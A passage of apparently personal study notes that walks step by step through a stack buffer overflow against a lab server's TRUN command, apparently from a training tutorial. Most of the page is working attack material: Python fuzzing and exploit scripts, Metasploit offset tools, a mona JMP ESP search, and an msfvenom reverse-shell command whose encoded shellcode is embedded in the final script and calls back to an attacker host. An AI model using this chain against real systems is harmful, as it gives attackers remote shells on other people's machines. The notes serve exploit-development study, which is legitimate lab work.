Categorieën
Buffer Overflow Uncategorized

Buffer Overflow

https://www.youtube.com/watch?v=GqwyonqLYdQ

Spiking

*generic_send_tcp 10.10.20.13 9999 trun.spk 0 0

trun.spk s_readline(); s_string("TRUN "); s_string_variable("0");

Fuzzing

fuzz.py #!/usr/bin/python import sys, socket from time import sleep

buffer = "A" * 100

while True: try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))

	`s.send(('TRUN /.:/' + buffer))`
	`s.close()`
	`sleep(1)`
	`buffer = buffer + "A"*100`

`except:`
	`print "Fuzzing crashed at %s bytes" % str(len(buffer))`
	`sys.exit()`

*Collect break point

Find offset

*/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 6000

offset.py

#!/usr/bin/python import sys, socket

offset = "pattern_create_output"

try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))

`s.send(('TRUN /.:/' + offset))`
`s.close()`

except: print "Error connecting to server" sys.exit()

  • Collect EIP value Immunity Debug

Find Offset

  • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 6000 -q EIP-Value

Overwrite EIP

eipwrite.py

#!/usr/bin/python import sys, socket

shellcode = "A" * 2003 + "B" * 4 (2003 = pattern_offset value)

try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))

`s.send(('TRUN /.:/' + shellcode))`
`s.close()`

except: print "Error connecting to server" sys.exit()

  • Check Immunity that EIP is all 424242

Check bad characters

  • run badchars.py
  • In Immunity follow in dump ESP
  • Check that after 42424242 no bad characters are found
  • 01 to FF should follow-up and not include B0 or other characters
  • if not write down all badchars locations

Find right module

Check for memory protection

  • Open Immunity
  • run !mona modules
  • look for dll with all set to false
  • run !mona find -s “\xff\xe4” -m essfunc.dll (check for jumps)
  • copy RETURN ADDR 625011AF

Check EIP overwrite with JMP info

  • open Immunity open black error and fill in JMP address 625011af
  • set breakpoint on window

*run writemodule.py

#!/usr/bin/python import sys, socket

# 625011af

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))

`s.send(('TRUN /.:/' + shellcode))`
`s.close()`

except: print "Error connecting to server" sys.exit()

  • go back to immunity check EIP shows JMP address and link to dll (essfunc.625011af) in example

Generate shellcode

  • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.11 LPORT=4444 EXITFUNC=thread -f c -a x86 -b “\x00”
  • copy outcome into overflow.py

#!/usr/bin/python import sys, socket

overflow = ( "\xba\xb9\x52\x1f\x1a\xd9\xc2\xd9\x74\x24\xf4\x58\x33\xc9\xb1" "\x52\x31\x50\x12\x03\x50\x12\x83\x79\x56\xfd\xef\x85\xbf\x83" "\x10\x75\x40\xe4\x99\x90\x71\x24\xfd\xd1\x22\x94\x75\xb7\xce" "\x5f\xdb\x23\x44\x2d\xf4\x44\xed\x98\x22\x6b\xee\xb1\x17\xea" "\x6c\xc8\x4b\xcc\x4d\x03\x9e\x0d\x89\x7e\x53\x5f\x42\xf4\xc6" "\x4f\xe7\x40\xdb\xe4\xbb\x45\x5b\x19\x0b\x67\x4a\x8c\x07\x3e" "\x4c\x2f\xcb\x4a\xc5\x37\x08\x76\x9f\xcc\xfa\x0c\x1e\x04\x33" "\xec\x8d\x69\xfb\x1f\xcf\xae\x3c\xc0\xba\xc6\x3e\x7d\xbd\x1d" "\x3c\x59\x48\x85\xe6\x2a\xea\x61\x16\xfe\x6d\xe2\x14\x4b\xf9" "\xac\x38\x4a\x2e\xc7\x45\xc7\xd1\x07\xcc\x93\xf5\x83\x94\x40" "\x97\x92\x70\x26\xa8\xc4\xda\x97\x0c\x8f\xf7\xcc\x3c\xd2\x9f" "\x21\x0d\xec\x5f\x2e\x06\x9f\x6d\xf1\xbc\x37\xde\x7a\x1b\xc0" "\x21\x51\xdb\x5e\xdc\x5a\x1c\x77\x1b\x0e\x4c\xef\x8a\x2f\x07" "\xef\x33\xfa\x88\xbf\x9b\x55\x69\x6f\x5c\x06\x01\x65\x53\x79" "\x31\x86\xb9\x12\xd8\x7d\x2a\x17\x17\x69\xa1\x4f\x25\x91\xa4" "\xd3\xa0\x77\xac\xfb\xe4\x20\x59\x65\xad\xba\xf8\x6a\x7b\xc7" "\x3b\xe0\x88\x38\xf5\x01\xe4\x2a\x62\xe2\xb3\x10\x25\xfd\x69" "\x3c\xa9\x6c\xf6\xbc\xa4\x8c\xa1\xeb\xe1\x63\xb8\x79\x1c\xdd" "\x12\x9f\xdd\xbb\x5d\x1b\x3a\x78\x63\xa2\xcf\xc4\x47\xb4\x09" "\xc4\xc3\xe0\xc5\x93\x9d\x5e\xa0\x4d\x6c\x08\x7a\x21\x26\xdc" "\xfb\x09\xf9\x9a\x03\x44\x8f\x42\xb5\x31\xd6\x7d\x7a\xd6\xde" "\x06\x66\x46\x20\xdd\x22\x66\xc3\xf7\x5e\x0f\x5a\x92\xe2\x52" "\x5d\x49\x20\x6b\xde\x7b\xd9\x88\xfe\x0e\xdc\xd5\xb8\xe3\xac" "\x46\x2d\x03\x02\x66\x64")

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.20.13',9999))

`s.send(('TRUN /.:/' + shellcode))`
`s.close()`